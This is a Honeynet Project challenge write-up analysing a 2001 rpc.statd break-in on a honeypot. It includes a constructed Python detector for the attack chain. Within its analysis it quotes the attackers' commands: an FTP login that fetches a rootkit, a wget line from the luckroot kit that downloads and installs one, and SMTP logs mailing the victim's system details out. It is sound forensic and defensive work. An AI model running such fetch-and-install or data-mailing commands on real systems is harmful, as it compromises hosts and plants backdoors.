Synopsis:
On March 15, 2001 a Honeynet Project system running Redhat Linux 6.2 was compromised using a well-known vulnerability in rpc.statd. The attack was executed from a system (211.185.125.124) owned by the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. However, the intruders appear to be of Romanian nationality. It is likely that the attackers compromised the system belonging to the KPES and used it as a "jump point" to attack the honeynet system.
Virtually all aspects of the attack were automated. The intruder's automation tools were all derivatives of tools widely available on the Internet.
Systems:
Victim:
  Hostname: asdf1
  OS: Redhat Linux 6.2 (2.2.14-5.0)
  IP: 172.16.1.108
  Hardware: Intel Pentium 200 MMX
  Disk: approximately 4 GB of mounted storage
Attacker:
  OS: Probably Redhat Linux 6.2
  IP: 211.185.125.124 (allocated to the Kyongsan Purim Elementary School (KPES) in South Korea)
Chain of events:
03/15/2001 20:21:23
The KPES machine begins performing port 111 scans of the IP range 172.16.1.101 - 172.16.1.108. The only devices found to be running the portmapper are 172.16.1.103 and 172.16.1.108.
03/15/2001 20:21:24
The KPES machine sends an RPC query to 172.16.1.103 to obtain the port number for rpc.statd. The target machine responds that rpc.statd is on port 32773.
03/15/2001 20:21:24
The KPES machine attempts the rpc.statd buffer overflow attack against 172.16.1.103. The attack fails: 172.16.1.103, which is running Solaris 7, does not appear to be vulnerable to this particular exploit (NOTE: if the .103 machine is SPARC-based it is definitely not vulnerable to this exploit, as the shellcode was written for the x86 platform). The attacking machine abandons the rpc.statd attack against this host.
03/15/2001 20:21:24
The KPES machine sends an RPC query to 172.16.1.108 to obtain the port number for rpc.statd. The victim machine responds that rpc.statd is on port 931.
03/15/2001 20:21:25
The KPES machine attempts the rpc.statd buffer overflow attack against 172.16.1.108. The attack is successful and binds a shell to port 39168.
03/15/2001 20:21:36
The KPES machine establishes a connection with 172.16.1.108 on port 39168 and executes the following sequence of commands:
1. cd /; uname -a; id;
2. ftp -v ftp.home.ro
USER soane
PASS i2ttgcj1d
SYST
TYPE I
PORT 172,16,1,108,4,3
RETR lk.tgz
QUIT
3. tar -zxvf lk.tgz
4. cd last
5. ./install
03/15/2001 20:45
The KPES machine closes all open connections to 172.16.1.108.
03/15/2001 20:46:15
172.16.1.108 establishes the first of two SMTP sessions. The first is with mta-v15.mail.yahoo.com (216.136.129.14, recipient bidi_damm@yahoo.com) and the second with outblaze.com (209.61.188.33, recipient last@linuxmail.org). Both sessions attempt to send a message informing the attackers of the successful attack and giving relevant system information. Only the message to the Yahoo account was delivered; the message to the outblaze.com account was rejected because the victim machine used a non-existent sender domain.
220 YSmtp mta502.mail.yahoo.com ESMTP service ready
EHLO asdf1
250-mta502.mail.yahoo.com
250-8BITMIME
250-SIZE 3145728
250 PIPELINING
MAIL From: SIZE=836
250 sender ok
RCPT To:
250 recipient ok
DATA
354 go ahead
Received: (from root@localhost)
by asdf1 (8.9.3/8.9.3) id TAA00952
for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote
* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0
* Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id : GenuineIntel
* Cpu Model : model : 4
model name : Pentium MMX
* Cpu Speed: cpu MHz : 200.457171
* Bogomips: bogomips : 399.77
* Spatiu Liber: Filesystem Size Used Avail Use% Mounted on
/dev/hda8 251M 33M 205M 14% /
/dev/hda1 23M 2.4M 19M 11% /boot
/dev/hda6 1.6G 2.1M 1.5G 0% /home
/dev/hda5 1.6G 367M 1.2G 23% /usr
/dev/hda7 251M 5.3M 232M 2% /var
.
250 ok dirdel
QUIT
221 mta502.mail.yahoo.com
03/15/2001 20:46:23
172.16.1.108 establishes the second SMTP session with an outblaze.com (209.61.188.33) server:
220 spf2.us3.outblaze.com ESMTP Sendmail 8.11.2/8.11.2; Fri, 16 Mar 2001 01:46:24 GMT
EHLO asdf1
250-spf2.us3.outblaze.com Hello IDENT:root@asdf1.xxxxxxxxxxxxxxxxxx.xxx [172.16.1.108], pleased to meet you
250-ENHANCEDSTATUSCODES
250-EXPN
250-VERB
250-8BITMIME
250-SIZE 10000000
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
MAIL From: SIZE=838
501 5.1.8 ... Domain of sender address root@asdf1 does not exist
QUIT
221 2.0.0 spf2.us3.outblaze.com closing connection
Questions:
1. The attackers used the rpc.statd attack to get into the system. What modifications did they make to the break in process to both automate and make the process faster?
The attackers automated most aspects of the attack, including the scanning for vulnerabilities, execution of the exploit, backdoor setup, rootkit transfer and installation, and system egress. The profile of the attack is similar to the one produced by the luckroot exploitation package and xzibit rootkit from Scan 13. The luckroot "auto rooter" package is comprised of three components: the luckgo script, the luckscan-a RPC scanner, and the luckstatdx rpc.statd exploit. The luckgo script runs the luckscan-a RPC scanner against a block of addresses; if luckscan-a finds a system with port 111 open, the script runs the luckstatdx exploit against that host. If the attack is successful, a shell is bound to port 39168. The luckstatdx exploit then opens a socket to port 39168 on the victim machine and pipes the following string to the shell:
cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n.
For the most part, this is identical to the commands executed on the honeynet system. The only differences were that FTP was used to transfer the rootkit to the victim machine, and that the rootkit had a different name and other minor customizations (directory name, IPs, etc.). The complete reassembled session follows:
cd /; uname -a; id;
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
ftp -v ftp.home.ro
Connected to ftp.home.ro.
220-
220-
220- H O M E . R O
220-
220- This server is for HOME.RO members only.
220- Go to http://www.home.ro/ to register.
220-
220- No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
soane
Name (ftp.home.ro:root): 331 Password required for soane.
Password:i2ttgcj1d
230 User soane logged in.
get lk.tgz
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
200 PORT command successful.
150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
226 Transfer complete.
bye
520333 bytes received in 35.5 secs (14 Kbytes/sec)
421 Idle Timeout (240 seconds): closing control connection.
tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
cd last
./install
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************
Are Make !
Are Gcc !
Nu Are Ssh !
* Inlocuim nestat ... alea alea * Gata...
* Dev...
* Gata
* Facem Director...Si Mutam Alea..
* Copiem ssh si alea
* Adaugam In Startup:) ...
* Luam Informatiile dorite ...
* Gata ! Trimitem Mailul ...Asteapta Te Rog
* Am trimis mailul ... stergem fisierele care nu mai trebuie .
* G A T A *
* That Was Nice Last
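A defender's view of the same chain, as an added example that is not part of the original write-up or of the luckroot package: a Python correlation over connection records that flags a host when portmap is probed from outside, the same source then connects to a high TCP port on it (the bound shell, generalized here from port 39168 to any port above 1023), and the host afterwards opens outbound FTP and then SMTP. The flow records and the 172.16.1. internal prefix are constructed assumptions, not the Honeynet capture.

```python
from collections import defaultdict
from datetime import datetime

INTERNAL = "172.16.1."   # monitored prefix (assumed); change for your network
WINDOW = 1800            # seconds; the whole chain must fit inside it

# Constructed flow log (not the Honeynet capture): one tuple per connection
# start, as (time, proto, src, sport, dst, dport), in the order logged.
FLOWS = [
    ("2001-03-15 20:21:23", "tcp", "211.185.125.124", 1034, "172.16.1.103", 111),
    ("2001-03-15 20:21:23", "tcp", "211.185.125.124", 1035, "172.16.1.108", 111),
    ("2001-03-15 20:21:24", "udp", "211.185.125.124", 1036, "172.16.1.108", 111),
    ("2001-03-15 20:21:25", "udp", "211.185.125.124", 1037, "172.16.1.108", 931),
    ("2001-03-15 20:21:36", "tcp", "211.185.125.124", 1040, "172.16.1.108", 39168),
    ("2001-03-15 20:22:10", "tcp", "172.16.1.108", 1027, "193.231.236.41", 21),
    ("2001-03-15 20:30:00", "tcp", "10.9.9.9", 2000, "172.16.1.103", 80),
    ("2001-03-15 20:46:15", "tcp", "172.16.1.108", 1028, "216.136.129.14", 25),
]

def _events_per_host(flows):
    """Group flows by internal host as inbound/outbound events; traffic that
    stays entirely inside or entirely outside the prefix is ignored."""
    per_host = defaultdict(list)
    for when, proto, src, _sport, dst, dport in flows:
        ts = datetime.strptime(when, "%Y-%m-%d %H:%M:%S")
        if dst.startswith(INTERNAL) and not src.startswith(INTERNAL):
            per_host[dst].append((ts, "in", src, proto, dport))
        elif src.startswith(INTERNAL) and not dst.startswith(INTERNAL):
            per_host[src].append((ts, "out", dst, proto, dport))
    return per_host

def detect_autorooter_chain(flows, window=WINDOW):
    """Flag a host when one outside source probes portmap (111), then connects
    to a high TCP port on it, and the host then opens outbound FTP, then SMTP."""
    hits = []
    for victim, events in _events_per_host(flows).items():
        events.sort()
        for t0, way, attacker, _proto, port in events:
            if way != "in" or port != 111:
                continue
            later = [e for e in events if 0 <= (e[0] - t0).total_seconds() <= window]
            shell = [e for e in later if e[1:4] == ("in", attacker, "tcp") and e[4] > 1023]
            ftp = [e for e in later if e[1] == "out" and e[4] == 21]
            mail = [e for e in later if e[1] == "out" and e[4] == 25]
            if shell and ftp and mail and shell[0][0] <= ftp[0][0] <= mail[0][0]:
                hits.append({"victim": victim, "attacker": attacker, "shell_port": shell[0][4],
                             "ftp_server": ftp[0][2], "mail_server": mail[0][2]})
                break   # one finding per victim is enough
    return hits
```

Running `detect_autorooter_chain(FLOWS)` on the constructed records reports only 172.16.1.108; the .103 host, which was probed but never served a shell, is not flagged.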
2. What system/country did the badguys come in from?
The attack was executed from a system (211.185.125.124) belonging to the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. This system appears to be an x86-based system running Redhat Linux 6.2. It is likely that the intruders compromised the KPES system using techniques similar to those used to exploit 172.16.1.108 and used it as a "jump point" for the attack.
3. What nationality are the badguys, and how were you able to determine this?
The intruders' nationality is likely Romanian. This assessment is based on the following observations:
a. The rootkit was transferred from a Romanian FTP server, s1.home.ro (193.231.236.41) to the compromised host.
b. The rootkit installed on the compromised system has been customized to hide connections from the following three Romanian-allocated address blocks: 192.254.34.x (logicnet.ro, ssigl.ro, sico.ro, Craiova.LogicTL.Net), 193.231.139.x (edu.ro, lgcb.ro, roedu.net), and 213.154.137.x (efesromania.pcnet.ro, fides.ro, urziceni.ro, slobozia.ro, pcnet.ro).
c. The rootkit installation script contains various comments in Romanian, whereas the original script from the xzibit kit contains only English comments. It is therefore likely that the modifications made to the original kit were done by native Romanian speakers.
4. What do the answers to questions #1 and #2 tell us about the tactics the badguys are using?
a. The attackers are unlikely to be able to write their own exploits and support tools, and are therefore mostly dependent on publicly available exploits and tools.
b. The attackers' tactic is to compromise as many systems as possible in as short a time as possible.
c. The attackers use intermediate hosts as "jump points" in an effort to obfuscate the origin of the attacks and avoid attribution.
d. The attackers will execute attacks without regard for their own operational security.
5. What did you learn from this challenge?
Retracing the attackers' footsteps and analyzing the automation of the attack was interesting. Though the techniques used by the intruders are not new, it is interesting to see how such techniques and tools are employed in the wild.
6. How long did this challenge take you?
Approximately 8 hours
Bonus Question:
Can you recover the blackhat's rootkit from the Snort binary log file? If so, how?
Yes, the rootkit can be retrieved by reassembling the ftp-data stream associated with the transfer of the rootkit to the compromised system. I used Ethereal to reassemble the stream and extract the rootkit from the Snort log. The rootkit contained the following files:
drwxr-xr-x 1031/users 0 2001-02-26 15:40:30 last/
-rwxr-xr-x 1031/users 611931 2002-02-08 08:08:13 last/ssh
-rw-r--r-- 1031/users 1 2001-02-26 10:29:58 last/pidfile
-rwx------ 1031/users 3713 2001-03-02 22:08:37 last/install
-rwx------ 1031/users 7165 2001-02-26 10:22:50 last/linsniffer
-rwxr-xr-x 1031/users 1345 1999-09-09 11:57:11 last/cleaner
-rw-r--r-- 1031/users 3278 2001-01-27 10:11:32 last/inetd.conf
-rwxr-xr-x 1031/users 79 2001-02-26 10:28:40 last/lsattr
-rw-r--r-- 1031/users 11407 2001-01-27 10:11:44 last/services
-rwxr-xr-x 1031/users 4060 2001-02-26 10:22:55 last/sense
-rw-r--r-- 1031/users 880 2000-10-22 15:29:44 last/ssh_config
-rw------- 1031/users 540 2000-10-22 15:29:44 last/ssh_host_key
-rw-r--r-- 1031/users 344 2000-10-22 15:29:44 last/ssh_host_key.pub
-rw------- 1031/users 512 2000-10-22 15:29:44 last/ssh_random_seed
-rw-r--r-- 1031/users 688 2001-02-26 10:29:51 last/sshd_config
-rwx------ 1031/users 8268 2001-02-26 10:22:59 last/sl2
-rwxr-xr-x 1031/users 4620 2001-02-26 10:23:10 last/last.cgi
-rwxr-xr-x 1031/users 33280 2001-02-26 10:23:33 last/ps
-rwxr-xr-x 1031/users 35300 2001-02-26 10:23:42 last/netstat
-rwxr-xr-x 1031/users 19840 2001-02-26 10:23:47 last/ifconfig
-rwxr-xr-x 1031/users 53588 2001-02-26 10:23:55 last/top
-rwx------ 1031/users 75 2001-02-26 10:24:03 last/logclear
-rw-r--r-- root/root 708 2001-03-02 22:05:12 last/s
-rwxr-xr-x 1031/users 632066 2001-02-26 09:46:04 last/mkxfs